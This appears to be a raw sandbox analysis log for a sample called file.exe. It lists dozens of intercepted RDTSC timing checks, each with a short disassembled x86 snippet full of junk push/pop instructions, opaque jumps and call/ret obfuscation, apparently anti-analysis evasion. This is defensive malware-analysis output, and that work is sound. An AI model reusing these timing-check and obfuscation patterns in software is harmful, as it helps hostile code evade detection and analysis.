Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6AC07 second address: C6AC13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC4E87CE376h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6D0F6 second address: C6D0FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6D0FB second address: C6D101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6D101 second address: C6D111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6D111 second address: C6D115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6D23F second address: C6D244 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6D244 second address: C6D252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6D252 second address: C6D258 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6D258 second address: C6D25C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6D25C second address: C6D295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 cld 0x0000000a mov dword ptr [ebp+122D2983h], ebx 0x00000010 push 00000000h 0x00000012 mov edx, dword ptr [ebp+122D2A4Dh] 0x00000018 sub dword ptr [ebp+122D1B70h], esi 0x0000001e call 00007FC4E9056F59h 0x00000023 pushad 0x00000024 jmp 00007FC4E9056F5Eh 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6D295 second address: C6D2CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FC4E87CE382h 0x0000000e pop edx 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007FC4E87CE383h 0x00000018 mov eax, dword ptr [eax] 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d push esi 0x0000001e pop esi 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6D2CE second address: C6D2D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6D2D8 second address: C6D2DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6D2DC second address: C6D38F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4E9056F5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e jmp 00007FC4E9056F5Dh 0x00000013 pop eax 0x00000014 jns 00007FC4E9056F6Fh 0x0000001a call 00007FC4E9056F62h 0x0000001f or dword ptr [ebp+122D35C6h], edi 0x00000025 pop edx 0x00000026 push 00000003h 0x00000028 jmp 00007FC4E9056F65h 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ecx 0x00000032 call 00007FC4E9056F58h 0x00000037 pop ecx 0x00000038 mov dword ptr [esp+04h], ecx 0x0000003c add dword ptr [esp+04h], 0000001Dh 0x00000044 inc ecx 0x00000045 push ecx 0x00000046 ret 0x00000047 pop ecx 0x00000048 ret 0x00000049 push eax 0x0000004a push ecx 0x0000004b mov esi, dword ptr [ebp+122D2BE5h] 0x00000051 pop esi 0x00000052 pop edx 0x00000053 push 00000003h 0x00000055 jmp 00007FC4E9056F62h 0x0000005a call 00007FC4E9056F59h 0x0000005f push eax 0x00000060 push edx 0x00000061 jo 00007FC4E9056F5Ch 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6D38F second address: C6D393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6D50C second address: C6D5C5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC4E9056F58h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+122D3310h], ecx 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007FC4E9056F58h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 adc si, D6B8h 0x00000036 push ECF19F23h 0x0000003b jng 00007FC4E9056F5Eh 0x00000041 add dword ptr [esp], 130E615Dh 0x00000048 jmp 00007FC4E9056F67h 0x0000004d push 00000003h 0x0000004f push 00000000h 0x00000051 push ebx 0x00000052 call 00007FC4E9056F58h 0x00000057 pop ebx 0x00000058 mov dword ptr [esp+04h], ebx 0x0000005c add dword ptr [esp+04h], 00000019h 0x00000064 inc ebx 0x00000065 push ebx 0x00000066 ret 0x00000067 pop ebx 0x00000068 ret 0x00000069 mov edx, dword ptr [ebp+122D2C89h] 0x0000006f and di, D02Eh 0x00000074 push 00000000h 0x00000076 mov edx, dword ptr [ebp+122D2BF5h] 0x0000007c push 00000003h 0x0000007e jl 00007FC4E9056F57h 0x00000084 push C362EF00h 0x00000089 push ecx 0x0000008a pushad 0x0000008b push eax 0x0000008c push edx 0x0000008d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6D5C5 second address: C6D5CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8ECFF second address: C8ED16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC4E9056F63h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8ED16 second address: C8ED1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8CC3F second address: C8CC4D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FC4E9056F56h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8CC4D second address: C8CC5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8D31A second address: C8D326 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8D326 second address: C8D32C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8D32C second address: C8D33E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC4E9056F5Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8D33E second address: C8D34A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8D34A second address: C8D34E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8D34E second address: C8D35C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8D35C second address: C8D366 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC4E9056F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8D4F4 second address: C8D4FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8D4FA second address: C8D504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC4E9056F56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8DA70 second address: C8DA74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8DA74 second address: C8DA78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C84CF3 second address: C84CF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8DEA7 second address: C8DEAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8DEAD second address: C8DEE2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC4E87CE376h 0x00000008 jmp 00007FC4E87CE380h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007FC4E87CE376h 0x00000017 jmp 00007FC4E87CE383h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8DEE2 second address: C8DEF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4E9056F60h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8E4B5 second address: C8E4BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8E62A second address: C8E64C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC4E9056F67h 0x00000009 pop eax 0x0000000a pop esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8E64C second address: C8E652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8E652 second address: C8E656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8EBB0 second address: C8EBBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8EBBB second address: C8EBBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8EBBF second address: C8EBC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8EBC3 second address: C8EBCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C94780 second address: C94785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C94785 second address: C9478B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C94C22 second address: C94C5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4E87CE387h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007FC4E87CE37Ch 0x0000000f js 00007FC4E87CE376h 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FC4E87CE37Bh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C94C5A second address: C94C60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C94E32 second address: C94E3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C94FD8 second address: C94FDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C94FDC second address: C94FE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C94FE0 second address: C94FE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C94FE6 second address: C94FF0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC4E87CE37Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C98A8D second address: C98A93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C98A93 second address: C98A99 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C98A99 second address: C98A9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9B240 second address: C9B29D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC4E87CE384h 0x00000009 popad 0x0000000a pop esi 0x0000000b add dword ptr [esp], 53B7402Eh 0x00000012 jmp 00007FC4E87CE388h 0x00000017 call 00007FC4E87CE379h 0x0000001c pushad 0x0000001d jmp 00007FC4E87CE386h 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9B29D second address: C9B2A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9B2A1 second address: C9B2D4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 jmp 00007FC4E87CE383h 0x0000000e pop eax 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007FC4E87CE37Bh 0x00000018 mov eax, dword ptr [eax] 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push esi 0x0000001e pop esi 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9B2D4 second address: C9B2EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC4E9056F5Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9B2EF second address: C9B2F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9B2F3 second address: C9B2F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9B484 second address: C9B488 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9B653 second address: C9B659 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9B659 second address: C9B65E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9B866 second address: C9B86C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9B86C second address: C9B893 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007FC4E87CE37Eh 0x00000014 popad 0x00000015 pushad 0x00000016 jnl 00007FC4E87CE376h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9B931 second address: C9B943 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC4E9056F5Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9BEAE second address: C9BEB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9BF38 second address: C9BF3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9BF3C second address: C9BF42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9BF42 second address: C9BF4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FC4E9056F56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9BF4C second address: C9BF67 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC4E87CE376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC4E87CE37Ah 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9BF67 second address: C9BF6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9BF6B second address: C9BF71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9C366 second address: C9C37A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007FC4E9056F58h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9C4AC second address: C9C4F3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FC4E87CE383h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007FC4E87CE378h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 or dword ptr [ebp+122D3059h], eax 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push edi 0x00000033 push edx 0x00000034 pop edx 0x00000035 pop edi 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9C4F3 second address: C9C4F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9C4F9 second address: C9C4FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9C998 second address: C9C99E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9C99E second address: C9CA1F instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC4E87CE376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FC4E87CE378h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push eax 0x00000028 mov dword ptr [ebp+122D3304h], esi 0x0000002e pop esi 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push edx 0x00000036 call 00007FC4E87CE378h 0x0000003b pop edx 0x0000003c mov dword ptr [esp+04h], edx 0x00000040 add dword ptr [esp+04h], 0000001Ch 0x00000048 inc edx 0x00000049 push edx 0x0000004a ret 0x0000004b pop edx 0x0000004c ret 0x0000004d jmp 00007FC4E87CE384h 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 pushad 0x00000057 popad 0x00000058 js 00007FC4E87CE376h 0x0000005e popad 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9EE61 second address: C9EE7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC4E9056F69h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9EE7F second address: C9EEF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FC4E87CE376h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007FC4E87CE378h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b mov esi, 45DE02A9h 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push eax 0x00000035 call 00007FC4E87CE378h 0x0000003a pop eax 0x0000003b mov dword ptr [esp+04h], eax 0x0000003f add dword ptr [esp+04h], 0000001Ah 0x00000047 inc eax 0x00000048 push eax 0x00000049 ret 0x0000004a pop eax 0x0000004b ret 0x0000004c mov edi, dword ptr [ebp+122D2B41h] 0x00000052 push 00000000h 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 push edx 0x00000059 pop edx 0x0000005a jc 00007FC4E87CE376h 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9F954 second address: C9F95A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA0392 second address: CA0397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
